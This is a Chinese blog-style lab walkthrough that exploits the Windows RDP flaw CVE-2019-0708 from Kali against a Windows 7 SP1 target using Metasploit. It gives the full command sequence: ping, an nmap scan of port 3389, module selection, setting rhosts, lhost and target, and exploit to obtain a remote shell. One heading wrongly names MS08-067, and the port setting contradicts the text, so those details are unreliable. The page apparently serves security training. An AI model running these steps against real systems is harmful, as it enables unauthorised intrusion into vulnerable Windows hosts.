CVE-2019-0708

文章详细介绍了CVE-2019-0708漏洞,这是一个影响Windows系统的远程代码执行漏洞,通过RDP服务进行攻击。利用过程包括关闭靶机防火墙、检测RDP服务、端口探测、使用Metasploit框架等,最终达到获取靶机shell的目的。特别提醒,需根据靶机系统选择正确的攻击目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

【CVE编号】

【靶标分类】

【漏洞分类】

【漏洞说明】

【靶标运行环境】

【靶标利用过程】


【CVE编号】

CVE-2019-0708

【靶标分类】

靶标类型:windows系统安全类靶标

【漏洞分类】

漏洞类型:远程代码执行漏洞

【漏洞说明】

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,导致机器蓝屏瘫痪。这个漏洞也是windows经典漏洞之一,跟之前的勒索,永恒之蓝病毒差不多,极具破坏性。

【靶标运行环境】

攻击机:kali

靶机:windows7_sp1

【靶标利用过程】

6.1靶机前期准备

  1. 关闭防火墙

2.确认RDP服务开启

6.2网络测试

ping 192.168.0.6

6.3端口探测

nmap -sS 192.168.0.6 -p 3389

6.4打开msf

msfconsole

6.5搜索漏洞MS08-067

search 0708

6.6使用CVE2019-0708漏洞

use 1

show options

6.7必要参数配置

  1. set rhosts 192.168.0.6 //设置靶机ip
  2. set rport 445   //攻击端口
  3. set lhost 192.168.0.4 //设置本地ip
  4. set lport 4444  //设置本地监听端口
  5. set target 2 //选择靶机对应的系统

注意:根据目标靶机的系统选择target,自动选择可能导致攻击利用不成功。目标靶机是windows7_sp1,选择 target 2

6.8进行攻击,成功获取靶机shell

exploit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值